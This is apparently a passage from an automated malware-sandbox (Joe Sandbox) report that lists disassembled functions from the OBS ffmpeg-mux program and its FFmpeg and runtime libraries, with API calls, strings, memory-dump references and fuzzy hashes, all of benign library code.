terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB8334B

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB835F9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB83644
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8BFB83679

Strings

csm, xrefs: 00007FF8BFB832E7
csm, xrefs: 00007FF8BFB83367
csm, xrefs: 00007FF8BFB83285

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction ID: 1542959659a5663cec8aa175234af273442f924243d733fe0a82547a0b794548
Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction Fuzzy Hash: 8BE19F73A086828AE7109FACD4902AD7BA1FB84BC8F184136DF9D57796DF38E495C740

Function 00007FF8A7C01E20 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 248COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A7C02154

Strings

src/libavutil/imgutils.c, xrefs: 00007FF8A7C02167, 00007FF8A7C02197
((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth, xrefs: 00007FF8A7C02176
av_image_get_linesize failed, xrefs: 00007FF8A7C020D0
((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth, xrefs: 00007FF8A7C021A6
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C02182

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpy
String ID: ((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth$((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth$Assertion %s failed at %s:%d$av_image_get_linesize failed$src/libavutil/imgutils.c
API String ID: 3510742995-882259572
Opcode ID: 0f20995bfb48e77148fec557d5fbaa226202661854b0129ced2db76bb94dc692
Instruction ID: f5e54b2326ddbb4e1b9d72e827fa849edca1078fa5ee9e4204e61a5df33cd898
Opcode Fuzzy Hash: 0f20995bfb48e77148fec557d5fbaa226202661854b0129ced2db76bb94dc692
Instruction Fuzzy Hash: A1A1CE72A1AB959AEB14CF15A94016EB7A1FB88BD0F188035EF4D07B94DF3CE442E740

Function 00007FF8A7C01A70 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 243COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A7C01B99
memcpy.MSVCRT ref: 00007FF8A7C01D31
abort.MSVCRT ref: 00007FF8A7C01DF2

Strings

src/libavutil/imgutils.c, xrefs: 00007FF8A7C01DC7, 00007FF8A7C01DF7
((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth, xrefs: 00007FF8A7C01E06
av_image_get_linesize failed, xrefs: 00007FF8A7C01D93
((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth, xrefs: 00007FF8A7C01DD6
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C01DE2

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpy$abort
String ID: ((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth$((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth$Assertion %s failed at %s:%d$av_image_get_linesize failed$src/libavutil/imgutils.c
API String ID: 3629556515-882259572
Opcode ID: 720129b710e5ed98a497ce0c61193de95d3f52df19d8a310f2021f8bda355e19
Instruction ID: eb8a4e6d204579f16ab31e0a1af39f50ac573117fc603370cb657e829d239001
Opcode Fuzzy Hash: 720129b710e5ed98a497ce0c61193de95d3f52df19d8a310f2021f8bda355e19
Instruction Fuzzy Hash: D3A19F36A0AB859BDB658F15E44026EB7A0FB88BD0F148035EF8D43BA4DF3CE5429740

Function 00007FF8A7C0D5B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7C0C1D0: strspn.MSVCRT ref: 00007FF8A7C0C1FC
Part of subcall function 00007FF8A7C0C1D0: strspn.MSVCRT ref: 00007FF8A7C0C245
Part of subcall function 00007FF8A7C0C1D0: strchr.MSVCRT ref: 00007FF8A7C0C25D
Part of subcall function 00007FF8A7C0C1D0: memcpy.MSVCRT ref: 00007FF8A7C0C28C

_aligned_free.MSVCRT ref: 00007FF8A7C0D678
_aligned_free.MSVCRT ref: 00007FF8A7C0D682
_aligned_free.MSVCRT ref: 00007FF8A7C0D72C
_aligned_free.MSVCRT ref: 00007FF8A7C0D736

Strings

No option name near '%s', xrefs: 00007FF8A7C0D7FC
Setting '%s' to value '%s', xrefs: 00007FF8A7C0D620
Unable to parse '%s': %s, xrefs: 00007FF8A7C0D7E3
Option '%s' not found, xrefs: 00007FF8A7C0D832

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free$strspn$memcpystrchr
String ID: No option name near '%s'$Option '%s' not found$Setting '%s' to value '%s'$Unable to parse '%s': %s
API String ID: 2931229598-2003673103
Opcode ID: 5496a8e94afb4b653dcbea0521884cd186c85a6990d9a2e756bf1473de833a0d
Instruction ID: babe9a2c21dd3b8819a1ce7d82ba07b5cef48c41df17490394e365fe48a13839
Opcode Fuzzy Hash: 5496a8e94afb4b653dcbea0521884cd186c85a6990d9a2e756bf1473de833a0d
Instruction Fuzzy Hash: 2A519E36A0AB86A1EB618F15F8547AEA7A0FB847C4F404035EE8D07B99DF7CD045E780

Function 00007FF8A7C644C0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 142COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C645DA

Strings

!"valid element size", xrefs: 00007FF8A7C645B6
src/libavutil/utils.c, xrefs: 00007FF8A7C645AF
D, xrefs: 00007FF8A7C645CD
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C645C6
. -_, xrefs: 00007FF8A7C6468B
[%d], xrefs: 00007FF8A7C64603

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: !"valid element size"$. -_$Assertion %s failed at %s:%d$D$[%d]$src/libavutil/utils.c
API String ID: 4206212132-1952739643
Opcode ID: 8dda062a40ab2f67f05643896e4bd6b922d436051c7bb03a64cbc94b01d14da1
Instruction ID: a4b2b301f478ac5519a726155a1e8f774a7949f830b4c87253f1640b6c803b7d
Opcode Fuzzy Hash: 8dda062a40ab2f67f05643896e4bd6b922d436051c7bb03a64cbc94b01d14da1
Instruction Fuzzy Hash: 545104B2E0AA5AA5EB208F11A54497D3B90FB55FC4F859035CE0E53784FE3CA795D300

Function 00007FF8BFB8BE24 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8BFD8

Part of subcall function 00007FF8BFB88C24: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8913D
Part of subcall function 00007FF8BFB88C24: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89175

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8BF8A

Strings

cli::array<, xrefs: 00007FF8BFB8BF57
cli::pin_ptr<, xrefs: 00007FF8BFB8BFA1
std::nullptr_t , xrefs: 00007FF8BFB8BF16
void, xrefs: 00007FF8BFB8BE6E
std::nullptr_t, xrefs: 00007FF8BFB8BF03
void , xrefs: 00007FF8BFB8BE96

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction ID: 62a6018308b4d67c254759c5f328e5506aae8002e6641cd06cbd69267843e90e
Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction Fuzzy Hash: B8515D62E18B5699FB11CBB8D8852BC77B0BB98788F44853ADF4D12B96DF3CA444C710

Function 00007FF8BFB58AB0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8BFB58B22
av_log.AVUTIL-58 ref: 00007FF8BFB58B83
abort.MSVCRT ref: 00007FF8BFB58B88

Strings

out->bps == in->bps, xrefs: 00007FF8BFB58B9C
out->planar == in->planar, xrefs: 00007FF8BFB58BB9
out->ch_count == in->ch_count, xrefs: 00007FF8BFB58B6C
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB58B78
src/libswresample/swresample.c, xrefs: 00007FF8BFB58B5D, 00007FF8BFB58B8D, 00007FF8BFB58BAA

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortav_logmemcpy
String ID: Assertion %s failed at %s:%d$out->bps == in->bps$out->ch_count == in->ch_count$out->planar == in->planar$src/libswresample/swresample.c
API String ID: 2496068414-3511948170
Opcode ID: b7f206457b9caba27af6789feee01ca3d186e054d088e26f0222d9f3267d756f
Instruction ID: 233e83b5c76a9cf5253617047d87c2b3d226544cfe92710e651a96db8483879c
Opcode Fuzzy Hash: b7f206457b9caba27af6789feee01ca3d186e054d088e26f0222d9f3267d756f
Instruction Fuzzy Hash: A021EFB6A09A46A6E720CF99E9550B9B3A8FB443D4F944232CF4C033A1DF3DF555CA00

Function 00007FF8BFBA63B0 Relevance: 13.7, APIs: 9, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8BFBA63D8
__scrt_initialize_crt.LIBCMT ref: 00007FF8BFBA641D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8BFBA642A
_RTC_Initialize.LIBCMT ref: 00007FF8BFBA6458
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8BFBA647E
__scrt_release_startup_lock.LIBCMT ref: 00007FF8BFBA64A9

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 05d8b91213d8a4974e84562f7c7d5bb031e6d637f96e7ddce6b44401f1817edf
Instruction ID: 548069d657487b409e04fc9a90c20cad2dcaa244d492bf33d765814fea35c534
Opcode Fuzzy Hash: 05d8b91213d8a4974e84562f7c7d5bb031e6d637f96e7ddce6b44401f1817edf
Instruction Fuzzy Hash: 1F81B4A1E0C70786FA64ABED98412B963D2AF957C0F14A03DDB1D47796EF3CE8458700

Function 00007FF8A7BEFAD0 Relevance: 13.7, APIs: 9, Instructions: 221COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7BEFBE6
_aligned_free.MSVCRT ref: 00007FF8A7BEFBF0
_aligned_free.MSVCRT ref: 00007FF8A7BEFC3D
_aligned_free.MSVCRT ref: 00007FF8A7BEFC45

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free
String ID:
API String ID: 2229574080-0
Opcode ID: bb8437b69a084f07a8ed3204e31c2741436194e29f9f638b4584538b28a8ba08
Instruction ID: c492dd69ca7ab4b727b475fc3be227156891f6baeb8ef5e0b11cb5c156898c00
Opcode Fuzzy Hash: bb8437b69a084f07a8ed3204e31c2741436194e29f9f638b4584538b28a8ba08
Instruction Fuzzy Hash: 9C81D3B2A0A742A5EB949F16E45027EA7A0FF84BC0F144435EE8D47785EF3CE492E740

Function 00007FF8A7BEF080 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7BEF10E
_aligned_free.MSVCRT ref: 00007FF8A7BEF118
_aligned_free.MSVCRT ref: 00007FF8A7BEF157
_aligned_free.MSVCRT ref: 00007FF8A7BEF15F

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free
String ID:
API String ID: 2229574080-0
Opcode ID: 01f721f6df29f9dd6bf7ef2f97b91fefc10836ccc23b581315bb421e2c98f023
Instruction ID: 48e65db637df153fa04a77c4c673f13ad4c6c256ef2dbf08a7e020cfecc68212
Opcode Fuzzy Hash: 01f721f6df29f9dd6bf7ef2f97b91fefc10836ccc23b581315bb421e2c98f023
Instruction Fuzzy Hash: 29618E76A0BA5665EFA59E15E41167E6390FF88BD8F044134EE8E477C2EF2CE442A340

Function 00007FF8A7C09D80 Relevance: 13.6, APIs: 2, Strings: 7, Instructions: 146stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C099A4
strcmp.MSVCRT ref: 00007FF8A7C09DD7

Strings

UINT32_MAX, xrefs: 00007FF8A7C0A2E8
%-15s , xrefs: 00007FF8A7C099B0
I64_MIN, xrefs: 00007FF8A7C0A2CF
INT_MIN, xrefs: 00007FF8A7C0A301
INT_MAX, xrefs: 00007FF8A7C0A2B6
I64_MAX, xrefs: 00007FF8A7C0A31A
%lld, xrefs: 00007FF8A7C0A29D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmp
String ID: %-15s $%lld$I64_MAX$I64_MIN$INT_MAX$INT_MIN$UINT32_MAX
API String ID: 1004003707-1419900426
Opcode ID: 60724dc2eec3de23298e2ae44bcb11fdf03ae2348c3838bc2f08ec1f1516dc3e
Instruction ID: a09f20a9b882a3d1fdbfe19f0963899c34ac649933b5d89c46f2dec01bfff29a
Opcode Fuzzy Hash: 60724dc2eec3de23298e2ae44bcb11fdf03ae2348c3838bc2f08ec1f1516dc3e
Instruction Fuzzy Hash: 8E516A31A0A642B6EB609E21A1047BE2360EF81BD0F945232DA5D577D5CF7DE992E3C0

Function 00007FF649AA2160 Relevance: 13.6, APIs: 9, Instructions: 98COMMON

Download Yara Rule

APIs

pthread_mutex_lock.W32-PTHREADS ref: 00007FF649AA21BB
os_event_reset.OBS ref: 00007FF649AA21E7
pthread_mutex_unlock.W32-PTHREADS ref: 00007FF649AA21F3
os_event_wait.OBS ref: 00007FF649AA21FF
pthread_mutex_lock.W32-PTHREADS ref: 00007FF649AA220B
memcpy.VCRUNTIME140 ref: 00007FF649AA227B
memcpy.VCRUNTIME140 ref: 00007FF649AA228E
os_event_signal.OBS ref: 00007FF649AA22D1
pthread_mutex_unlock.W32-PTHREADS ref: 00007FF649AA22DD

Memory Dump Source

Source File: 0000000B.00000002.2291350522.00007FF649AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF649AA0000, based on PE: true

Associated: 0000000B.00000002.2291251062.00007FF649AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291442922.00007FF649AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291474165.00007FF649AA9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff649aa0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpypthread_mutex_lockpthread_mutex_unlock$os_event_resetos_event_signalos_event_wait
String ID:
API String ID: 2918620995-0
Opcode ID: 2ecd02ec26d4cc9ba7addf2ffba6d2c38598a6939d4a4f97ceb40f02c73610ba
Instruction ID: d3af697b259da72e961ab3366e21ad60468b9cca78ed4d799ab14d7096b8e172
Opcode Fuzzy Hash: 2ecd02ec26d4cc9ba7addf2ffba6d2c38598a6939d4a4f97ceb40f02c73610ba
Instruction Fuzzy Hash: FE413D3265CA8283DA50FF21E4513AD7760FB95B98F440032EF8D87A5ADF38D1A48720

Function 00007FF8A7C97C30 Relevance: 13.6, APIs: 9, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7C97B90: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A7C97EA7,?,?,?,?,?,?,?,?,00007FF8A7C21502), ref: 00007FF8A7C97BB6
Part of subcall function 00007FF8A7C97B90: LeaveCriticalSection.KERNEL32(?,?,00007FF8A7C97EA7,?,?,?,?,?,?,?,?,00007FF8A7C21502), ref: 00007FF8A7C97BDB

TryEnterCriticalSection.KERNEL32 ref: 00007FF8A7C97CB0
CloseHandle.KERNEL32(?,?,?,?,?,?,00007FF8A7C21817), ref: 00007FF8A7C97CF8
CloseHandle.KERNEL32(?,?,?,?,?,?,00007FF8A7C21817), ref: 00007FF8A7C97D02
LeaveCriticalSection.KERNEL32 ref: 00007FF8A7C97D07
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00007FF8A7C21817), ref: 00007FF8A7C97D17
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00007FF8A7C21817), ref: 00007FF8A7C97D1C
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00007FF8A7C21817), ref: 00007FF8A7C97D23
free.MSVCRT ref: 00007FF8A7C97D28

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CriticalSection$Delete$CloseEnterHandleLeave$free
String ID:
API String ID: 3899327206-0
Opcode ID: 2505bcbe3cd4d1a469b291fb81c03ba1909a3890b205137eb9b30536ece67948
Instruction ID: 9362c39a0c86d8db2efa29ed123cf64b8544ea77cabc02d4a96df6c0b49b85bc
Opcode Fuzzy Hash: 2505bcbe3cd4d1a469b291fb81c03ba1909a3890b205137eb9b30536ece67948
